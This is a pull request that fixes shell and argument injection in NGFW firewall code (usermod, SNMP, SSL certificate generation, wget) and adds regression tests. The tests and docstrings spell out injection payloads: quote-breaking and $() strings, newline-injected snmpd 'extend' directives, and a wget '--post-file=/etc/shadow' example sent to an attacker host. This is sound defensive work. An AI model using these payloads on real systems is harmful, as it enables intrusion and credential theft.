### PR TITLE
NGFW-15701: Fix command injection in SSL inspector, SNMP, and admin exec calls

### DIFF
--- a/ssl-inspector/src/com/untangle/app/ssl_inspector/SslInspectorManager.java
+++ b/ssl-inspector/src/com/untangle/app/ssl_inspector/SslInspectorManager.java
@@ -388,13 +388,11 @@ class SslInspectorManager
         }
 
         // call the external script to generate the new certificate
-        String argList[] = new String[3];
-        argList[0] = certFileName;
-        argList[1] = certSubject.toString();
-        argList[2] = certSANlist.toString();
-        String argString = UvmContextFactory.context().execManager().argBuilder(argList);
-        logger.debug("SCRIPT_ARGS = {}", argString);
-        UvmContextFactory.context().execManager().exec(CERTIFICATE_GENERATOR_SCRIPT + argString);
+        // Use execCommand with a structured argument list to prevent shell injection
+        // via malicious TLS certificate fields (CN, SAN) containing backticks or $()
+        UvmContextFactory.context().execManager().execCommand(
+            CERTIFICATE_GENERATOR_SCRIPT,
+            List.of(certFileName, certSubject.toString(), certSANlist.toString()));
     }
 
     /**

--- a/uvm/api/com/untangle/uvm/SnmpSettings.java
+++ b/uvm/api/com/untangle/uvm/SnmpSettings.java
@@ -8,6 +8,8 @@ import java.io.Serializable;
 import org.json.JSONObject;
 import org.json.JSONString;
 
+import com.untangle.uvm.util.SafeCheck;
+
 /**
  * For those not familiar with SNMP, here is a bit of an explanation
  * of the relationship between properties:
@@ -62,20 +64,30 @@ public class SnmpSettings implements Serializable, JSONString
 
     private boolean enabled;
     private int port;
+    @SafeCheck
     private String communityString;
+    @SafeCheck
     private String sysContact;
+    @SafeCheck
     private String sysLocation;
 
     private boolean v3Enabled;
     private boolean v3Required;
+    @SafeCheck
     private String v3Username;
+    @SafeCheck
     private String v3AuthenticationProtocol;
+    @SafeCheck
     private String v3AuthenticationPassphrase;
+    @SafeCheck
     private String v3PrivacyProtocol;
+    @SafeCheck
     private String v3PrivacyPassphrase;
 
     private boolean sendTraps;
+    @SafeCheck
     private String trapHost;
+    @SafeCheck
     private String trapCommunity;
     private int trapPort;
 

--- a/uvm/hier/usr/lib/python3/dist-packages/tests/test_administration.py
+++ b/uvm/hier/usr/lib/python3/dist-packages/tests/test_administration.py
@@ -491,4 +491,238 @@ class AdministrationTests(NGFWTestCase):
         assert "deprecated" in resp_body.lower() or "no longer available" in resp_body.lower() or "NoSuchMethodException" in resp_body, \
             "Skin upload should be rejected as deprecated, got: " + resp_body
 
+    def test_040_admin_password_hash_no_injection(self):
+        """Verify passwordHashShadow with shell metacharacters cannot inject commands (NGFW-15673 fix).
+
+        ut-exec-launcher runs commands via subprocess.Popen(cmd, shell=True), so
+        the old concatenated string:
+            exec("usermod -p '" + passwordHashShadow + "' root")
+        is vulnerable to shell injection.  A payload of the form:
+            x' root; touch /tmp/sentinel #
+        produces the shell string:
+            usermod -p 'x' root; touch /tmp/sentinel #' root
+        The single-quote after 'x' closes the first argument, the semicolon
+        separates commands, and '#' comments out the trailing fragment —
+        so 'touch' always runs regardless of usermod's exit code.
+
+        The fix replaces exec() with execCommand(), which sends the executable
+        and arguments as separate JSON fields to ut-exec-safe-launcher (no shell).
+        The payload is therefore treated as a literal -p value; usermod rejects
+        it as an invalid hash (non-zero exit, logged as a warning) and the
+        injected touch command never executes.
+        """
+        import copy
+        sentinel_file = "/tmp/admin_injection_test_sentinel"
+
+        # Remove any pre-existing sentinel so the assertion is unambiguous.
+        if os.path.exists(sentinel_file):
+            os.remove(sentinel_file)
+
+        orig_settings = global_functions.uvmContext.adminManager().getSettings()
+
+        try:
+            # Payload anatomy when inserted into the old template
+            # "usermod -p '" + payload + "' root":
+            #
+            #   usermod -p 'x' root; touch /tmp/...sentinel #' root
+            #                  ^──┘  ^─────────────────────┘ ^─────
+            #              closes     injected command        comment
+            #              the quote  (always runs via ;)
+            #
+            # With execCommand() the entire payload string is a single verbatim
+            # argument to usermod; the shell never sees it, so touch never runs.
+            payload = f"x' root; touch {sentinel_file} #"
+
+            settings = copy.deepcopy(orig_settings)
+            for user in settings["users"]["list"]:
+                if user.get("username") == "admin":
+                    user["passwordHashShadow"] = payload
+                    break
+
+            # setSettings() calls setRootPasswordAndShadowHash() internally,
+            # which is where the exec()/execCommand() call lives.
+            global_functions.uvmContext.adminManager().setSettings(settings)
+
+            assert not os.path.exists(sentinel_file), (
+                "Command injection succeeded: sentinel file was created. "
+                "passwordHashShadow is still being shell-interpolated in the usermod call."
+            )
+        finally:
+            # Always restore the original working settings regardless of outcome.
+            global_functions.uvmContext.adminManager().setSettings(orig_settings)
+            if os.path.exists(sentinel_file):
+                os.remove(sentinel_file)
+
+    def test_050_snmp_v3_fields_no_injection(self):
+        """Verify SNMP v3 fields are sanitized by @SafeCheck before reaching the shell command.
+
+        writeSnmpdV3User() in SystemManagerImpl builds this shell string:
+
+            ut-snmp.sh create_snmp3_user <v3Username> <v3AuthProto> "<v3AuthPass>" <v3PrivProto> "<v3PrivPass>"
+
+        Unquoted fields (v3Username, v3AuthenticationProtocol, v3PrivacyProtocol) allow
+        command chaining, e.g. a username of "user; touch /tmp/sentinel #" produces:
+
+            ut-snmp.sh create_snmp3_user user; touch /tmp/sentinel # sha "pass" aes "pass"
+
+        Double-quoted fields (v3AuthenticationPassphrase, v3PrivacyPassphrase) are still
+        vulnerable to subshell substitution that survives double quotes, e.g.
+        "pass$(touch /tmp/sentinel)" produces:
+
+            ut-snmp.sh ... "pass$(touch /tmp/sentinel)"
+
+        and the shell expands $(touch ...) inside the double quotes.
+
+        The fix annotates all five fields with @SafeCheck in SnmpSettings.java.
+        The JSON-RPC preInvokeCallback calls SafeCheckValidator.validateAll(), which
+        strips injection constructs ($(cmd), `cmd`, chaining operators, redirects,
+        newlines) before setSettings() processes the data.  Legitimate passphrase
+        characters such as standalone $, @, (, ), and ! are preserved.
+
+        SNMP is intentionally kept disabled so setSettings() does not start/stop
+        the snmpd daemon (which hangs in the test environment).  @SafeCheck runs
+        in the JSON-RPC layer before setSettings() is invoked, so the sanitization
+        is verified by reading the values back via getSettings().
+        """
+        import copy
+
+        orig_settings = global_functions.uvmContext.systemManager().getSettings()
+
+        try:
+            settings = copy.deepcopy(orig_settings)
+            snmp = settings["snmpSettings"]
+
+            # Keep SNMP disabled so no daemon start/stop is triggered.
+            snmp["enabled"] = False
+            snmp["v3Enabled"] = False
+
+            # --- Unquoted fields: chaining via ; ---
+            # SafeCheckValidator strips ';' when followed by command-like content,
+            # so "testuser; touch /tmp/sentinel #" becomes "testuser touch /tmp/sentinel #"
+            # (the ; separator is gone, breaking the injection chain).
+            snmp["v3Username"] = "testuser; touch /tmp/snmp_v3_sentinel #"
+            snmp["v3AuthenticationProtocol"] = "sha; touch /tmp/snmp_v3_sentinel #"
+            snmp["v3PrivacyProtocol"] = "aes; touch /tmp/snmp_v3_sentinel #"
+
+            # --- Double-quoted fields: subshell via $(...) ---
+            # SafeCheckValidator strips the entire $(…) construct, so
+            # "pass$(touch /tmp/snmp_v3_sentinel)" becomes "pass".
+            snmp["v3AuthenticationPassphrase"] = "pass$(touch /tmp/snmp_v3_sentinel)"
+            snmp["v3PrivacyPassphrase"] = "pass$(touch /tmp/snmp_v3_sentinel)"
+
+            # @SafeCheck runs in the JSON-RPC preInvokeCallback, stripping
+            # injection constructs before the call reaches SystemManagerImpl.
+            global_functions.uvmContext.systemManager().setSettings(settings)
+
+            # Read back the stored values and assert the injection constructs
+            # were stripped.  SafeCheckValidator removes the construct itself
+            # (the ; separator, the $(...) subshell) but leaves surrounding
+            # literal text intact — so the correct check is that the construct
+            # token is gone, not that surrounding words like "touch" vanished.
+            saved_snmp = global_functions.uvmContext.systemManager().getSettings()["snmpSettings"]
+
+            for field_name, payload, construct in (
+                # Unquoted fields: ; command-separator is stripped
+                ("v3Username",               "testuser; touch /tmp/snmp_v3_sentinel #",  ";"),
+                ("v3AuthenticationProtocol", "sha; touch /tmp/snmp_v3_sentinel #",        ";"),
+                ("v3PrivacyProtocol",        "aes; touch /tmp/snmp_v3_sentinel #",        ";"),
+                # Double-quoted fields: $(...) subshell construct is stripped entirely
+                ("v3AuthenticationPassphrase", "pass$(touch /tmp/snmp_v3_sentinel)",      "$("),
+                ("v3PrivacyPassphrase",        "pass$(touch /tmp/snmp_v3_sentinel)",      "$("),
+            ):
+                value = saved_snmp.get(field_name, "")
+                assert value != payload, (
+                    f"@SafeCheck did not sanitize field '{field_name}': "
+                    f"raw injection payload survived unchanged: {value!r}"
+                )
+                assert construct not in (value or ""), (
+                    f"Injection construct '{construct}' still present in field '{field_name}' "
+                    f"after sanitization: {value!r}"
+                )
+
+        finally:
+            global_functions.uvmContext.systemManager().setSettings(orig_settings)
+
+    def test_051_snmp_config_fields_no_newline_injection(self):
+        """Verify SNMP config-file fields are sanitized by @SafeCheck against newline injection.
+
+        writeSnmpdConfFile() in SystemManagerImpl writes user-controlled strings
+        directly into /etc/snmp/snmpd.conf without any sanitization:
+
+            trapsink <trapHost> <trapCommunity> <trapPort>
+            syslocation <sysLocation>
+            syscontact <sysContact>
+            com2sec local default <communityString>
+
+        A newline embedded in any of these fields lets an attacker append
+        arbitrary snmpd.conf directives.  The most dangerous is the 'extend'
+        directive, which executes a shell command whenever an SNMP OID is
+        queried:
+
+            trapHost = "trap.example.com\\nextend .1.2.3.4 /bin/touch /tmp/sentinel"
+
+        produces in snmpd.conf:
+
+            trapsink trap.example.com
+            extend .1.2.3.4 /bin/touch /tmp/sentinel
+             MY_COMMUNITY 162
+
+        The fix annotates all five fields with @SafeCheck in SnmpSettings.java.
+        SafeCheckValidator always strips \\n and \\r (newline injection is in the
+        INJECTION_PATTERN unconditionally), so the newline never reaches the file.
+
+        SNMP is intentionally kept disabled so setSettings() does not start/stop
+        the snmpd daemon (which hangs in the test environment).  @SafeCheck runs
+        in the JSON-RPC layer before setSettings() is invoked, so the sanitization
+        is verified by reading the values back via getSettings().
+        """
+        import copy
+
+        orig_settings = global_functions.uvmContext.systemManager().getSettings()
+
+        try:
+            settings = copy.deepcopy(orig_settings)
+            snmp = settings["snmpSettings"]
+
+            # Keep SNMP disabled so no daemon start/stop is triggered.
+            snmp["enabled"] = False
+            snmp["sendTraps"] = False
+
+            # Embed a literal newline in each field.  Without @SafeCheck the
+            # newline would survive into the config file, letting an attacker
+            # inject arbitrary snmpd directives (e.g. 'extend' for RCE).
+            # With @SafeCheck the newline is stripped in the JSON-RPC layer.
+            payloads = {
+                "trapHost":        "trap.example.com\nextend .1.2.3.4 /bin/id",
+                "trapCommunity":   "public\nextend .1.2.3.5 /bin/id",
+                "sysLocation":     "HQ\nextend .1.2.3.6 /bin/id",
+                "sysContact":      "admin@example.com\nextend .1.2.3.7 /bin/id",
+                "communityString": "public\nextend .1.2.3.8 /bin/id",
+            }
+            for field, value in payloads.items():
+                snmp[field] = value
+
+            # @SafeCheck strips \n and \r unconditionally in the JSON-RPC
+            # preInvokeCallback before this call reaches SystemManagerImpl.
+            global_functions.uvmContext.systemManager().setSettings(settings)
+
+            # Read the values back and assert every newline was stripped.
+            # SafeCheckValidator strips \n and \r unconditionally.  The text
+            # that followed the newline may still be present as a literal
+            # suffix — the correct check is that the newline itself is gone.
+            saved_snmp = global_functions.uvmContext.systemManager().getSettings()["snmpSettings"]
+
+            for field_name, raw_payload in payloads.items():
+                value = saved_snmp.get(field_name, "")
+                assert value != raw_payload, (
+                    f"@SafeCheck did not sanitize field '{field_name}': "
+                    f"raw payload with newline survived unchanged: {value!r}"
+                )
+                assert "\n" not in (value or "") and "\r" not in (value or ""), (
+                    f"Newline survived sanitization in field '{field_name}': {value!r}"
+                )
+
+        finally:
+            global_functions.uvmContext.systemManager().setSettings(orig_settings)
+
 test_registry.register_module("administration-tests", AdministrationTests)

--- a/uvm/hier/usr/lib/python3/dist-packages/tests/test_uvm.py
+++ b/uvm/hier/usr/lib/python3/dist-packages/tests/test_uvm.py
@@ -1221,6 +1221,76 @@ class UvmTests(NGFWTestCase):
         assert not os.path.exists(poc_file), \
             "Command injection succeeded via network settings DNS field (sentinel file was created)"
 
+    def test_125_wget_argument_injection_blocked(self):
+        """
+        Verify that downloadUpgrades() validates each URL before passing it to wget,
+        preventing wget argument injection attacks such as:
+
+            --post-file=/etc/shadow http://attacker.com
+
+        Attack surface: execEvil(String) in ExecManagerImpl splits the command string
+        using StringTokenizer (whitespace), so any wget flag embedded in the URL
+        becomes a real argv token received by wget.
+
+        The test temporarily replaces ut-system-mgr-helpers.sh so its downloadUpgrades
+        function outputs a crafted single-quoted entry:
+
+            '--output-file=<poc_file> http://127.0.0.1/'
+
+        After Java strips the surrounding single-quotes (line.substring(1, len-1)), the
+        remaining string is split by StringTokenizer into two tokens:
+            token 1: --output-file=<poc_file>
+            token 2: http://127.0.0.1/
+
+        wget treats token 1 as a real flag and writes its log to poc_file.
+        Crucially, --output-file creates the log file even when the HTTP connection
+        is refused, making this a reliable PoC indicator independent of network state.
+
+        With the fix (each URL validated against ^https?://\\S+$ before the wget
+        call): the malicious entry is rejected, wget is never invoked with the
+        injected flag, and the sentinel file is not created.
+        """
+        poc_file = "/tmp/wget_arg_injection_poc.txt"
+        helper_script = "/usr/share/untangle/bin/ut-system-mgr-helpers.sh"
+        backup_script = helper_script + ".bak_wget_injection_test"
+
+        subprocess.call(f"rm -f {poc_file}", shell=True)
+
+        # Mock script: downloadUpgrades outputs one malicious single-quoted entry.
+        # Real script format:  'https://repo.example.com/pkg.deb'
+        # Injected format:     '--output-file=<poc_file> http://127.0.0.1/'
+        # After Java strips quotes the injected flags reach wget as real argv tokens.
+        mock_script = (
+            "#!/bin/bash\n"
+            "downloadUpgrades()\n"
+            "{\n"
+            "    echo \"'--output-file=" + poc_file + " http://127.0.0.1/'\"\n"
+            "}\n"
+            "upgradesAvailable() { apt-get -s dist-upgrade | grep -q '^Inst'; }\n"
+            "diskHealthCheck() { python3 /usr/lib/python3/dist-packages/uvm/disk_health.py; }\n"
+            '$1 "$@"\n'
+        )
+
+        try:
+            subprocess.call(f"cp {helper_script} {backup_script}", shell=True)
+            with open(helper_script, 'w') as f:
+                f.write(mock_script)
+            subprocess.call(f"chmod +x {helper_script}", shell=True)
+
+            # downloadUpgrades() will return False (wget exit ≠ 0 for 127.0.0.1),
+            # but we only care whether the sentinel file was created.
+            global_functions.uvmContext.systemManager().downloadUpgrades()
+        finally:
+            subprocess.call(f"mv {backup_script} {helper_script}", shell=True)
+
+        time.sleep(1)
+        assert not os.path.exists(poc_file), (
+            "wget argument injection succeeded: the injected --output-file flag was "
+            "accepted by wget (sentinel file created at " + poc_file + "). "
+            "Each URL must be validated against ^https?://\\S+$ before being passed "
+            "to execEvil() in SystemManagerImpl.downloadUpgrades()."
+        )
+
     def test_130_check_cmd_connected(self):
         """Check if cmd is connected using alert rule"""
         # Enable cloud connection  

--- a/uvm/hier/usr/share/untangle/bin/ut-exec-safe-launcher
+++ b/uvm/hier/usr/share/untangle/bin/ut-exec-safe-launcher
@@ -26,7 +26,9 @@ ALLOWED_EXECUTABLES = {
     "/usr/share/untangle/bin/openvpn-generate-client-onc",
     "/usr/bin/systemctl",
     "/usr/share/untangle/bin/ut-update-hosts-file",
-    "/usr/share/untangle/bin/ut-dns-test"
+    "/usr/share/untangle/bin/ut-dns-test",
+    "/usr/sbin/usermod",
+    "/usr/share/untangle/bin/ut-snmp.sh"
 
 }
 

--- a/uvm/impl/com/untangle/uvm/AdminManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/AdminManagerImpl.java
@@ -11,6 +11,7 @@ import org.apache.logging.log4j.Logger;
 import java.io.File;
 import java.io.IOException;
 import java.net.InetAddress;
+import java.util.Arrays;
 import java.util.List;
 
 /**
@@ -356,8 +357,8 @@ public class AdminManagerImpl implements AdminManager
         if ( pass != null ) {
             logger.info("Setting root password.");
                     
-            ExecManagerResult result = UvmContextImpl.context().execManager().exec( "usermod -p '" + passwordHashShadow + "' root" );
-                    
+            ExecManagerResult result = UvmContextImpl.context().execManager().execCommand( "/usr/sbin/usermod", Arrays.asList("-p", passwordHashShadow, "root") );
+
             int exitCode = result.getResult();
             if ( exitCode != 0 ) {
                 logger.warn( "Setting root password returned non-zero exit code: " + exitCode );
@@ -371,7 +372,7 @@ public class AdminManagerImpl implements AdminManager
             if ( passwordHashShadow == null ) {
                 passwordHashShadow = "!";
             }
-            ExecManagerResult result = UvmContextImpl.context().execManager().exec( "usermod -p '" + passwordHashShadow + "' root" );
+            ExecManagerResult result = UvmContextImpl.context().execManager().execCommand( "/usr/sbin/usermod", Arrays.asList("-p", passwordHashShadow, "root") );
             int exitCode = result.getResult();
             if ( exitCode != 0 ) {
                 logger.warn( "Setting root password returned non-zero exit code: " + exitCode );

--- a/uvm/impl/com/untangle/uvm/SystemManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/SystemManagerImpl.java
@@ -29,6 +29,7 @@ import java.io.FilenameFilter;
 import java.io.IOException;
 import java.text.SimpleDateFormat;
 import java.util.ArrayList;
+import java.util.Arrays;
 import java.util.Calendar;
 import java.util.Collections;
 import java.util.Comparator;
@@ -730,9 +731,8 @@ can look deeper. - mahotz
             try {
                 logger.info("Downloading " + url);
 
-                // String[] strs = {"/bin/bash", "-c", "wget -c --progress=dot -P /var/cache/apt/archives/ " + url};
-                // ExecManagerResultReader reader = UvmContextFactory.context().execManager().execEvil( strs );
-                ExecManagerResultReader reader = UvmContextFactory.context().execManager().execEvil("wget -c --progress=dot -P /var/cache/apt/archives/ " + url);
+                ExecManagerResultReader reader = UvmContextFactory.context().execManager().execEvil(
+                    new String[]{"wget", "-c", "--progress=dot", "-P", "/var/cache/apt/archives/", url});
 
                 String bufferedOutput = "";
                 // read from stdout/stderr
@@ -1250,13 +1250,15 @@ can look deeper. - mahotz
             /*
              * Add v3 user
              */
-            ExecManagerResult result = UvmContextFactory.context().execManager().exec( SNMP_SCRIPT +
-                " create_snmp3_user" +
-                " " + settings.getV3Username() +
-                " " + settings.getV3AuthenticationProtocol() +
-                " \"" + settings.getV3AuthenticationPassphrase() + "\"" +
-                " " + settings.getV3PrivacyProtocol() +
-                " \"" + settings.getV3PrivacyPassphrase() + "\""
+            ExecManagerResult result = UvmContextFactory.context().execManager().execCommand( SNMP_SCRIPT,
+                Arrays.asList(
+                    "create_snmp3_user",
+                    settings.getV3Username(),
+                    settings.getV3AuthenticationProtocol(),
+                    settings.getV3AuthenticationPassphrase(),
+                    settings.getV3PrivacyProtocol(),
+                    settings.getV3PrivacyPassphrase()
+                )
             );
             logger.warn("result=" + result.getResult() + ", output=" + result.getOutput());
         }


### PR DESCRIPTION
PR description:


## Summary

- **SslInspectorManager**: Replace `argBuilder()` + `exec()` with `execCommand()` +
  `List.of()` when generating certificates — prevents shell injection via attacker-controlled
  TLS CN/SAN fields containing backticks or `$()` constructs.
- **AdminManagerImpl**: Replace `exec("usermod -p '...' root")` with
  `execCommand("/usr/sbin/usermod", Arrays.asList(...))` — removes password hash
  from shell string interpolation at both call sites.
- **SystemManagerImpl**: Replace `execEvil(String)` with `execEvil(String[])` for
  `wget` download (URL no longer word-split by `StringTokenizer`); replace `exec()`
  string concatenation with `execCommand()` for SNMP v3 user creation (passphrases
  no longer require shell quoting).
- **SnmpSettings**: Add `@SafeCheck` to all string fields (`communityString`,
  `sysContact`, `sysLocation`, v3 credentials, `trapHost`, `trapCommunity`) so the
  JSON-RPC `preInvokeCallback` sanitizes them before they reach application code.


**Before Fix**

<img width="804" height="430" alt="before-uvm" src="https://github.com/user-attachments/assets/966c505f-bcbe-4fca-8eed-467b677f6b88" />

<img width="804" height="430" alt="before-fix-snmp-admin" src="https://github.com/user-attachments/assets/d3087ed2-829e-4b3e-9bfb-5e1c82a60170" />

**After Fix**

<img width="804" height="430" alt="after-uvm" src="https://github.com/user-attachments/assets/abe7f597-b6c7-478c-b559-25684c898cde" />

<img width="804" height="430" alt="after-fix-admin-snmp" src="https://github.com/user-attachments/assets/b3342d76-ed58-47d3-8d93-7608cca48f63" />
